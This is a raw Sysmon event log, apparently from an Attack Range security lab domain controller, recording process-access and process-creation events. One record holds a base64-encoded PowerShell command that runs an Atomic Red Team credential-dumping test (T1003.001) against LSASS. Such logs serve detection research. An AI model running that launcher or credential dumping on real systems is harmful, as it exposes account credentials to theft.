15:52:57.745{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004941Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.745{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004940Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.745{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004939Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.745{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004938Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.745{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004937Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.745{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004936Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.745{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004935Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.745{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004934Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.745{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004933Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.745{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CD9-5FA1-FD00-000000008801}1352C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004932Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.745{D28789B6-7CD9-5FA1-FC00-000000008801}26124136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD9-5FA1-FD00-000000008801}1352C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+319332ed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd4177(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd3e48(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+318854ad(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30d949de(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30df2ead(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd63a3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dc8328(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd485b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd43f7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd4177(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd3e48(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+318854ad(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30d949de(wow64) 154100x80000000000000004931Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.745{D28789B6-7CD9-5FA1-FD00-000000008801}1352C:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CD8-5FA1-59E7-0A0000000000}0xae7590HighMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E{D28789B6-7CD9-5FA1-FC00-000000008801}2612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwBvAG4AZABzACAAMwAwADAAIAAtAEUAeABlAGMAdQB0AGkAbwBuAEwAbwBnAFAAYQB0AGgAIABDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAYQB0AGMAXwBlAHgAZQBjAHUAdABpAG8AbgAuAGMAcwB2AA== 10341000x80000000000000004930Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.400{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7CD9-5FA1-FC00-000000008801}2612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004929Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.400{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7CD9-5FA1-FC00-000000008801}2612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004928Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.369{D28789B6-7CD9-5FA1-FC00-000000008801}2612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_pc2re053.d1k.ps12020-11-03 15:52:57.369 10341000x80000000000000004927Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.353{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7CD9-5FA1-FC00-000000008801}2612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004926Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.338{D28789B6-7CD8-5FA1-EF00-000000008801}39643644C:\Windows\system32\conhost.exe{D28789B6-7CD9-5FA1-FC00-000000008801}2612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004925Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.338{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004924Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.338{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004923Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.338{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004922Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.338{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004921Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.338{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004920Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.338{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004919Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 